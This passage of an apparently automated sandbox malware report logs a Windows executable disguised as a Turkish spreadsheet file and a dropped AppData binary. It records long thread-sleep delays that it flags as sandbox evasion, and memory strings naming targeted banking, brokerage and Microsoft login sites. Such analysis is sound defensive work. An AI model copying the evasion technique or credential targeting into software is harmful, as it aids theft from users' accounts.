Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 7964 Thread sleep time: -594969s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 7964 Thread sleep time: -594844s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 7964 Thread sleep time: -594734s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 7964 Thread sleep time: -594625s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 7964 Thread sleep time: -594512s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 7964 Thread sleep time: -594391s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 7964 Thread sleep time: -594281s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 7964 Thread sleep time: -594172s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 7964 Thread sleep time: -594062s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 7964 Thread sleep time: -593953s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 7964 Thread sleep time: -593844s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe TID: 7508 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe TID: 8052 Thread sleep count: 37 > 30
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe TID: 8052 Thread sleep time: -34126476536362649s >= -30000s
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe TID: 8052 Thread sleep time: -600000s >= -30000s
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe TID: 8056 Thread sleep count: 2192 > 30
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe TID: 8052 Thread sleep time: -599860s >= -30000s
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe TID: 8056 Thread sleep count: 7652 > 30
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe TID: 8052 Thread sleep time: -599750s >= -30000s
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe TID: 8052 Thread sleep time: -599641s >= -30000s
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe TID: 8052 Thread sleep time: -599516s >= -30000s
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe TID: 8052 Thread sleep time: -599406s >= -30000s
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe TID: 8052 Thread sleep time: -599297s >= -30000s
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe TID: 8052 Thread sleep time: -599188s >= -30000s
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe TID: 8052 Thread sleep time: -599063s >= -30000s
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe TID: 8052 Thread sleep time: -598938s >= -30000s
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe TID: 8052 Thread sleep time: -598691s >= -30000s
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe TID: 8052 Thread sleep time: -598563s >= -30000s
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe TID: 8052 Thread sleep time: -598453s >= -30000s
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe TID: 8052 Thread sleep time: -598344s >= -30000s
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe TID: 8052 Thread sleep time: -598234s >= -30000s
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe TID: 8052 Thread sleep time: -598125s >= -30000s
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe TID: 8052 Thread sleep time: -598016s >= -30000s
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe TID: 8052 Thread sleep time: -597906s >= -30000s
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe TID: 8052 Thread sleep time: -597797s >= -30000s
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe TID: 8052 Thread sleep time: -597687s >= -30000s
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe TID: 8052 Thread sleep time: -597578s >= -30000s
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe TID: 8052 Thread sleep time: -597469s >= -30000s
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe TID: 8052 Thread sleep time: -597359s >= -30000s
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe TID: 8052 Thread sleep time: -597250s >= -30000s
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe TID: 8052 Thread sleep time: -597141s >= -30000s
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe TID: 8052 Thread sleep time: -597016s >= -30000s
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe TID: 8052 Thread sleep time: -596891s >= -30000s
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe TID: 8052 Thread sleep time: -596781s >= -30000s
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe TID: 8052 Thread sleep time: -596672s >= -30000s
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe TID: 8052 Thread sleep time: -596562s >= -30000s
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe TID: 8052 Thread sleep time: -596453s >= -30000s
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe TID: 8052 Thread sleep time: -596344s >= -30000s
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe TID: 8052 Thread sleep time: -596229s >= -30000s
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe TID: 8052 Thread sleep time: -596110s >= -30000s
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe TID: 8052 Thread sleep time: -596000s >= -30000s
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe TID: 8052 Thread sleep time: -595891s >= -30000s
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe TID: 8052 Thread sleep time: -595766s >= -30000s
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe TID: 8052 Thread sleep time: -595641s >= -30000s
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe TID: 8052 Thread sleep time: -595531s >= -30000s
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe TID: 8052 Thread sleep time: -595422s >= -30000s
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe TID: 8052 Thread sleep time: -595313s >= -30000s
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe TID: 8052 Thread sleep time: -595188s >= -30000s
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe TID: 8052 Thread sleep time: -595063s >= -30000s
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe TID: 8052 Thread sleep time: -594953s >= -30000s
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe TID: 8052 Thread sleep time: -594844s >= -30000s
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe TID: 8052 Thread sleep time: -594719s >= -30000s
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe TID: 8052 Thread sleep time: -594609s >= -30000s
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe TID: 8052 Thread sleep time: -594500s >= -30000s
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe TID: 8052 Thread sleep time: -594389s >= -30000s
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe TID: 8052 Thread sleep time: -594281s >= -30000s
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 600000 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 599891 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 599766 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 599656 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 599543 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 599422 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 599313 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 599203 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 599078 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 598969 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 598828 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 598719 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 598610 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 598485 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 598360 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 598235 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 598110 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 597985 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 597860 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 597735 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 597578 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 597448 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 597312 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 597000 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 596780 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 596656 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 596547 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 596438 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 596313 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 596203 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 596094 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 595969 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 595859 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 595750 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 595641 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 595531 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 595422 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 595313 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 595188 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 595078 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 594969 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 594844 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 594734 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 594625 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 594512 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 594391 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 594281 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 594172 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 594062 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 593953 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 593844 Jump to behavior
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Thread delayed: delay time: 599860
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Thread delayed: delay time: 599750
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Thread delayed: delay time: 599641
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Thread delayed: delay time: 599516
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Thread delayed: delay time: 599406
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Thread delayed: delay time: 599297
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Thread delayed: delay time: 599188
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Thread delayed: delay time: 599063
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Thread delayed: delay time: 598938
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Thread delayed: delay time: 598691
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Thread delayed: delay time: 598563
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Thread delayed: delay time: 598453
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Thread delayed: delay time: 598344
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Thread delayed: delay time: 598234
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Thread delayed: delay time: 598125
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Thread delayed: delay time: 598016
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Thread delayed: delay time: 597906
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Thread delayed: delay time: 597797
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Thread delayed: delay time: 597687
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Thread delayed: delay time: 597578
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Thread delayed: delay time: 597469
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Thread delayed: delay time: 597359
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Thread delayed: delay time: 597250
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Thread delayed: delay time: 597141
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Thread delayed: delay time: 597016
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Thread delayed: delay time: 596891
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Thread delayed: delay time: 596781
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Thread delayed: delay time: 596672
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Thread delayed: delay time: 596562
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Thread delayed: delay time: 596453
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Thread delayed: delay time: 596344
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Thread delayed: delay time: 596229
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Thread delayed: delay time: 596110
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Thread delayed: delay time: 596000
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Thread delayed: delay time: 595891
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Thread delayed: delay time: 595766
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Thread delayed: delay time: 595641
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Thread delayed: delay time: 595531
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Thread delayed: delay time: 595422
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Thread delayed: delay time: 595313
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Thread delayed: delay time: 595188
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Thread delayed: delay time: 595063
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Thread delayed: delay time: 594953
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Thread delayed: delay time: 594844
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Thread delayed: delay time: 594719
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Thread delayed: delay time: 594609
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Thread delayed: delay time: 594500
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Thread delayed: delay time: 594389
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Thread delayed: delay time: 594281
Source: OnCgVRIhY.exe, 0000000E.00000002.4521616204.0000000004316000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: OnCgVRIhY.exe, 0000000E.00000002.4521616204.0000000004316000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: OnCgVRIhY.exe, 0000000E.00000002.4521616204.0000000004316000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: OnCgVRIhY.exe, 0000000E.00000002.4521616204.0000000003FF8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: OnCgVRIhY.exe, 0000000E.00000002.4521616204.0000000003FF8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: OnCgVRIhY.exe, 0000000E.00000002.4521616204.0000000003FF8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: global block list test formVMware20,11696428655
Source: OnCgVRIhY.exe, 0000000E.00000002.4521616204.0000000003FF8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: OnCgVRIhY.exe, 0000000E.00000002.4521616204.0000000004316000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: global block list test formVMware20,11696428655
Source: OnCgVRIhY.exe, 0000000E.00000002.4521616204.0000000004316000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: OnCgVRIhY.exe, 0000000E.00000002.4521616204.0000000003FF8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: OnCgVRIhY.exe, 0000000E.00000002.4521616204.0000000004316000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
Source: OnCgVRIhY.exe, 0000000E.00000002.4521616204.0000000004316000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: OnCgVRIhY.exe, 0000000E.00000002.4521616204.0000000003FF8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: AMC password management pageVMware20,11696428655
Source: OnCgVRIhY.exe, 0000000E.00000002.4521616204.0000000003FF8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: tasks.office.comVMware20,11696428655o
Source: OnCgVRIhY.exe, 0000000E.00000002.4521616204.0000000003FF8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: OnCgVRIhY.exe, 0000000E.00000002.4521616204.0000000003FF8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: OnCgVRIhY.exe, 0000000E.00000002.4521616204.0000000004316000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: OnCgVRIhY.exe, 0000000E.00000002.4521616204.0000000003FF8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: OnCgVRIhY.exe, 0000000E.00000002.4521616204.0000000003FF8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: OnCgVRIhY.exe, 0000000E.00000002.4521616204.0000000004316000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: OnCgVRIhY.exe, 0000000E.00000002.4521616204.0000000004316000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: OnCgVRIhY.exe, 0000000E.00000002.4521616204.0000000003FF8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: OnCgVRIhY.exe, 0000000E.00000002.4521616204.0000000004316000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: OnCgVRIhY.exe, 0000000E.00000002.4521616204.0000000003FF8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: OnCgVRIhY.exe, 0000000E.00000002.4521616204.0000000003FF8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: OnCgVRIhY.exe, 0000000E.00000002.4521616204.0000000004316000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: OnCgVRIhY.exe, 0000000E.00000002.4521616204.0000000003FF8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: discord.comVMware20,11696428655f
Source: OnCgVRIhY.exe, 0000000E.00000002.4521616204.0000000004316000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: OnCgVRIhY.exe, 0000000E.00000002.4521616204.0000000003FF8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: OnCgVRIhY.exe, 0000000E.00000002.4521616204.0000000004316000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: OnCgVRIhY.exe, 0000000E.00000002.4521616204.0000000004316000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: OnCgVRIhY.exe, 0000000E.00000002.4521616204.0000000004316000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: OnCgVRIhY.exe, 0000000E.00000002.4521616204.0000000003FF8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: OnCgVRIhY.exe, 0000000E.00000002.4521616204.0000000004316000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: dev.azure.comVMware20,11696428655j
Source: OnCgVRIhY.exe, 0000000E.00000002.4521616204.0000000003FF8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: OnCgVRIhY.exe, 0000000E.00000002.4521616204.0000000004316000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: OnCgVRIhY.exe, 0000000E.00000002.4521616204.0000000003FF8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
Source: OnCgVRIhY.exe, 0000000E.00000002.4521616204.0000000003FF8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: OnCgVRIhY.exe, 0000000E.00000002.4521616204.0000000003FF8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: OnCgVRIhY.exe, 0000000E.00000002.4521616204.0000000003FF8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: OnCgVRIhY.exe, 0000000E.00000002.4521616204.0000000003FF8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
